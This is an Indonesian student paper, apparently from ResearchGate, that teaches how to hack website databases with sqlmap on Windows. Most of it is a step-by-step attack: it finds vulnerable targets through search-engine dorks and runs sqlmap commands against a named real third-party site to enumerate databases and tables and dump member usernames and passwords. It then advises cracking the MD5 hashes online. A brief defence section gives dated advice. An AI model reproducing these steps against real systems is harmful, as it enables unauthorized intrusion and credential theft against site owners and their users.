Anda di halaman 1dari 8

See

discussions, stats, and author profiles for this publication at: https://www.researchgate.net/publication/303372599

Hack Database Website Menggunakan Python


dan Sqlmap Pada Windows

Article · May 2016

CITATIONS READS

0 9,521

2 authors, including:

Tanti Siti Nurjanah


UIN Sunan Gunung Djati Bandung
2 PUBLICATIONS 0 CITATIONS

SEE PROFILE

All content following this page was uploaded by Tanti Siti Nurjanah on 21 May 2016.

The user has requested enhancement of the downloaded file.


Hack Database Website Menggunakan Python dan Sqlmap Pada Windows

Tanti Siti Nurjanah , Entik Insanudin


1137050210
Jurusan Teknik Informatika , UIN Sunan Gunung Djati Bandung
tanti.sn@gmail.com , insan@if.uinsgd.ac.id

Abstrak teknologi yang semakin pesat kini cara


berkomunikasi antar sesama dapat
Kemudahan mengakses sebuah dilakukan melalui internet. Internet
informasi dan komunikasi melalui internet, (kependekan dari interconnection-
hal ini memungkinkan masyarakat dapat
networking) adalah seluruh jaringan
menyimpan semua data yang dimilikinya
kedalam sebuah website yang ada komputer yang saling terhubung
diinternet. Dimana internet merupakan menggunakan standar sistem global
seluruh jaringan komputer yang saling Transmission Control Protocol/Internet
terhubung menggunakan standar sistem Protocol Suite (TCP/IP) sebagai protokol
global Transmission Control pertukaran paket (packet switching
Protocol/Internet Protocol Suite (TCP/IP) communication protocol) untuk melayani
sebagai protokol pertukaran paket (packet
miliaran pengguna di seluruh dunia.
switching communication protocol) untuk
melayani miliaran pengguna di seluruh Internet sudah menjadi sebuah istilah yang
dunia. tidak asing lagi di kalangan masyarakat,
Dengan demikian hal ini dapat karena melalui internet masyarakat dapat
memicu sebuah kesempatan bagi orang mendapatkan berbagai informasi melulai
orang yang biasa disebut dengan hacker berbagai situs web. Situs web (bahasa
dapat dengan mudah mencuri data data Inggris: website) adalah suatu halaman
tersebut salah satunya dengan teknik
web yang saling berhubungan yang
deface website dengan menggunakan
python dan sqlmap di windows. umumnya berada pada peladen yang sama
Dimana python adalah bahasa berisikan kumpulan informasi yang
pemrograman yang diciptakan oleh Guido disediakan secara perorangan, kelompok,
van Rossum dan popular sebagai bahasa atauorganisasi.Sebuah situs web biasanya
skripting dan pemrograman Web. ditempatkan setidaknya pada sebuah server
web yang dapat diakses melalui jaringan
Kata Kunci : Internet , Hacking , Python seperti Internet, ataupun jaringan wilayah
lokal (LAN) melalui alamat Internet yang
1. PENDAHULUAN dikenali sebagai URL.
1.1 Latar Belakang
Kemudahan mengakses sebuah
Kehidupan manusia semakin hari informasi dan komunikasi melalui internet
semakin berkembang baik dari segi pola , hal ini memungkinkan masyarakat dapat
berpikir atau dari segi tatacara menyimpan semua data yang dimilikinya
berkomunikasi. Dengan kemajuan kedalam sebuah website yang ada

1|By Tanti Siti Nurjanah (1137050210)


diinternet. Dengan demikian hal ini dapat 2.2 Pengertian Website
memicu sebuah kesempatan bagi orang
orang yang biasa disebut dengan hacker Situs web (bahasa Inggris: website)
dapat dengan mudah mencuri data data adalah suatu halaman web yang saling
tersebut salah satunya dengan teknik berhubungan yang umumnya berada pada
Deface Website dengan Menggunakan peladen yang sama berisikan kumpulan
Python dan SQLmap di Windows. informasi yang disediakan secara
perorangan, kelompok,
1.2 Rumusan Masalah atauorganisasi.Sebuah situs web biasanya
 Bagaimana cara mengetahui sebuah ditempatkan setidaknya pada sebuah
celah pada sebuah website? server web yang dapat diakses melalui
 Bagaimana cara mendapatkan sebuah jaringan seperti Internet, ataupun jaringan
database sebuah website? wilayah lokal (LAN) melalui alamat
 Bagaimana cara menganggunginya? Internet yang dikenali sebagai URL.

2.3 Pengertian Deface


1.3 Tujuan
 Mengetahui cara mengetahui celah Deface adalah kegiatan hacking
sebuah website yang mengubah tampilan sebuah website.
 Mengetahui cara mendapatkan Sedangkan cara yang digunakan bisa
database sebuah website bermacam-macam seperti SQL Injection,
 Mengatahui bagaimana cara mencari password, dan cara lainnya.
menanggunanginya Deface adalah Aktifitas yang mengotori,
“menodai”, merubah inti dari isi halaman
2. LANDASAN TEORI suatu website dengan tulisan, gambar,
2.1 Pengertian Internet ataupun link yang membuat suatu link
menjadi melenceng dari perintah yang
Internet (kependekan dari kita buat. Sedangkan pengertian dari web
interconnection-networking) adalah deface adalah melakukan perubahan pada
seluruh jaringan komputer yang saling halaman web depan pada situs-situs
terhubung menggunakan standar sistem tertentu, dilakukan oleh para hacker atau
global Transmission Control cracker untuk mengganggu informasi
Protocol/Internet Protocol Suite (TCP/IP) yang dimunculkan pada halaman situs
sebagai protokol pertukaran paket (packet yang dimaksud. Pengertian mudahnya,
switching communication protocol) untuk web deface adalah menambahkan gambar,
melayani miliaran pengguna di seluruh tulisan ke suatu web milik orang lain
dunia. Internet sudah menjadi sebuah tanpa sepengetahuan adminnya.
istilah yang tidak asing lagi di kalangan
masyarakat, karena melalui internet Defacing adalah merupakan bagian
masyarakat dapat mendapatkan berbagai dari kegiatan hacking web atau program
informasi melulai berbagai situs web. application, yang menfokuskan target
operasi pada perubahan tampilan dan
konfigurasi fisik dari web atau program
aplikasi tanpa melalui source code
program tersebut. Sedangkan deface itu

2|By Tanti Siti Nurjanah (1137050210)


sendiri adalah hasil akhir dari kegiatan Sedangkan bahasa tingkat rendah
cracking. Tekniknya adalah dengan merupakan bahasa mesin atau bahasa
membaca source codenya, terus ngganti assembly. Secara sederhana. sebuah
image dan editing html tag. komputer hanya dapat mengeksekusi

2.4 Pengertian Phyton program yang ditulis dalam berrtuk


bahasa mesin. Oleh karena itu. jika suatu
Python adalah bahasa pemrograman program ditulis dalam bentuk bahasa
yang diciptakan oleh Guido van Rossum tinght tinggi. maka program tersebut harus
dan popular sebagai bahasa skripting dan diproses dulu sebelum bisa dijalanlon
pemrograman Web. Merujuk pengertian dalam komputer. Hal ini merupakan salah
dari wikipedia, Python adalah bahasa satu kekurangan bahasa tingkat tinggi yang
pemrograman interpretatif multiguna memerlukan waktu untuk memproses
dengan filosofi perancangan yang suatu program sebelum program tersebut
berfokus pada tingkat keterbacaan kode. dijalankan. Akan tetapi, bahasa tingkat
Python diklaim sebagai bahasa yang tinggi mempunyai banyak sekali
menggabungkan kapabilitas, kemampuan, keuntungan. Bahasa tinglrat tinggi mudah
dengan sintaksis kode yang sangat jelas, dipelajari. mudah ditulis. mudah dibaca.
dan dilengkapi dengan fungsionalitas dan tentu saia mudah dicari kesalahannya.
pustaka standar yang besar serta Bahasa tingkat tinggi juga mudah diubah
komprehensif. Python mendukung multi portabel untuk disesuaikan dengan mesin
paradigma pemrograman, utamanya; yang menjalankannya. Hal ini berbeda
namun tidak dibatasi; pada pemrograman dengan bahasa mesin yang hanya dapat
berorientasi objek, pemrograman digunakan untuk mesin tersebut. Dengan
imperatif, dan pemrograman fungsional. berbagai kelebihan ini. maka banyak
Salah satu fitur yang tersedia pada python aplikasi ditulis menggunakan bahasa
adalah sebagai bahasa pemrograman tinflrat tinggi. Proses mengubah dari
dinamis yang dilengkapi dengan bentuk bahasa tingkat tinggi ke tingkat
manajemen memori otomatis. Seperti rendah dalam bahasa pemrograman ada
halnya pada bahasa pemrograman dinamis rkra tipe.
lainnya, python umumnya digunakan Yakni interpreter dan compiler.
sebagai bahasa skrip meski pada interpreter membaca program berbahasa
praktiknya penggunaan bahasa ini lebih tingkat tinggi kemudian mengeksekusi
luas mencakup konteks pemanfaatan yang program tersebut. Hal ini berarti
umumnya tidak dilakukan dengan interpreter melakukan apa yang dikatakan
menggunakan bahasa skrip. Python dapat dalam program tersebut. Dapat dikatakan.
digunakan untuk berbagai keperluan interpreter membaca per baris kemudian
pengembangan perangkat lunak dan dapat mengekselrusinya.
berjalan di berbagai platform sistem
operasi. Python merupakan salah satu
contoh bahasa tingkat tinggi. Contoh lain
bahasa tinggat tinggi adalah pascal, c++,
perl,java, dan sebagainya.

3|By Tanti Siti Nurjanah (1137050210)


2.5 Pengertian SQLmap

SQLMAP adalah penetrasi open


source pengujian alat yang
mengotomatisasi proses mendeteksi dan
mengeksploitasi kelemahan SQL injection
dan mengambil alih server database.

3. PEMBAHASAN
3.1 Cara hack database website
menggungan python dan sqlmap

Untuk melakukan deface website Gambar 3 Proses Akhir Instalasi Python


menggunakan python dan sqlmap makan
tools yang harus dipersiapkan antara lain : Cek pada cmd apakah python sudah
terinstal atau belum yaitu dengan
 Python mengetikan python
 Sqlmap
 Cmd

Instal python yang telah diunduh hingga


proses path pada system.

Gambar 4 Python Sudah Terinstal

Setelah menginstal semua tools diatas


maka hal yang pertama kali harus
dipersiapkan yaitu dengan menyiapkan
Gambar 1 Mentahan Python target website yang akan di deface. Cara
mengetahui target website yang akan
dideface yaitu dengan cara mengetikan
“products.php?cat=” di search engine .

Gambar 5 Tampilan pencarian target


Gambar 2 Proses Awal Instalasi Python

4|By Tanti Siti Nurjanah (1137050210)


Pilih salah satu website misalnya dan ketikan sqlmap.py –u (alamat target) --
http://neutralposture.com/_site/products.ph dbs
p?cat=04 tambahkan tanda “ „ “ diakhir
http://neutralposture.com/_site/products.ph Contoh
p?cat=04‟ . Setelah itu coba cek jika C:\Users\tanti\Desktop\sqlmap>s
halaman pertama sebelum ditambahkan „ qlmap.py –u
dengan halaman setelah ditambahkan „ http://neutralposture.com/_site
/products.php?cat=04 --dbs
berbeda maka web tersebut dapat di
deface.

Gambar 2 Tampilan Website sebelum ditambahkan ‘

Gambar 6 Hasil Scanning Database

Gambar 3 Tampilan Website sesudah ditambahkan ‘ Setelah melakukan scanning


Setelah target sudah ditentukan database maka selanjutnya kita lakukan
maka selajutnya kita lakukan scaning scanning tables dengan cara sqlmap.py –u
database dengan cara buka cmd lalu masuk (alamat target) –D (nama database) --
ke directory sqlmap yang sudah diekstrak tables

C:\Users\tanti\Desktop\sqlmap>s
qlmap.py –u
http://neutralposture.com/_site
/products.php?cat=04 –D
872128_npweb --tables

5|By Tanti Siti Nurjanah (1137050210)


Gambar 8 Hasil column table member

Untuk mengetahui isi dari tabel tersebut


maka kita bisa melakukan dump dengan
cara sqlmap.py –u (alamat target) –D
(nama database) –T (nama table) –C (nama
field) –dump. Contoh

C:\Users\tanti\Desktop\sqlmap>s
qlmap.py –u
http://neutralposture.com/_site
/products.php?cat=04 –D
872128_npweb –T member –C
Gambar 7 Hasil Scanning tables username, password --dump
Gambar 9 Hasil Field tabel member
Setelah mendapatkan daftar table
Dari hasil tersebut kita dapat mengetahui
yang ada pada database kita dapat melihat
isi keseluruhan database dari sebuah
atribut yang ada dalam table tersebut
website. Jika mendapatkan password yang
contohnya pilih salah satu table dengan
di enkripsi menggunakan md5 kita dapat
cara mengetikan sqlmap.py –u (alamat
mendeskripsinya melalui salah satu web
target) –D (nama database) –T (nama
yang dapat mendeskripsi md5
table) –column . Contoh

C:\Users\tanti\Desktop\sqlmap>s
qlmap.py –u
http://neutralposture.com/_site
/products.php?cat=04 –D
872128_npweb –T member --column

Gambar 10 Deskripsi md5 di salah satu website online

6|By Tanti Siti Nurjanah (1137050210)


3.2 Cara menanggulangi agar database databasenya bisa menggunakan search
website tidak terkena injection engine dengan mengetikan
“products.php?cat=” lalu tambahkan
Pada dasarnya , SQL Injection tanda „
adalah metode yang digunakan terhadap
 Cara mengamankan sebuah website
situs dan aplikasi untuk mendapatkan
agar tidak bisa di injection yaitu bisa
akses ke situs web atau aplikasi data,
menggunakan
disimpan dalam database SQL . SQL
mysql_real_escape_srting() dan
Injection digunakan untuk mendapatkan
mysql_query()
akses ke informasi database (atau seluruh
perusahaan ) , untuk menghancurkan
3.2. Saran
informasi database , atau untuk
Adapun saran–saran yang dapat
memanipulasi informasi database ini . Ini
dikembangkan dari cara hack database
adalah metode yang digunakan untuk
website dan cara mangamankannya yaitu:
mengeksploitasi kerentanan keamanan
 Gunakan enkripsi dalam penyimpanan
dari aplikasi atau situs web . Hal untuk
sebuah file database
menganggulanginya yaitu :
 Uji setiap query yang dibuat dalam
 Gunakan mysql_real_escape_string pembuatan sebuah website agar
Fungsi ini PHP lolos karakter ddapat meminimaliris tingkat celah
khusus untuk digunakan dalam untuk para hacker
query SQL dan melindungi Anda
dari serangan .Permintaan sekarang
akan terlihat seperti ini : 5. DAFTAR PUSTAKA
<?
$q = "SELECT `id` FROM `users` Utami Ema,dkk. 2004. Logika ALgoritma
WHERE `username`= ' " dan Implementasinya Dalam
.mysql_real_escape_string( Python di GNU/LINUX.
$_GET['username'] ). " ' AND Yogyakarta: ANDI
`password`= ' "
.mysql_real_escape_string(
$_GET['password'] ). " ' "; Zam Efvy . 2011 . Buku Sakti Hacker
.Jakarta : Mediakita
?>
 Gunakan mysql_query ( ) http://blazterzt-
error.blogspot.co.id/2012/12/deface-sqli-
dengan-python.html

4. PENUTUP http://www.onofile.net/2013/08/cara-
ampuh-hack-website-terbaru-2013.html
4.1 Kesimpulan
 Hack database sebuah website di
windows dapat menggunakan tools
python dan sqlmap
 Untuk mendapatkan target sebuah web
yang akan dideface ataupun di hack

7|By Tanti Siti Nurjanah (1137050210)

View publication stats

Beri Nilai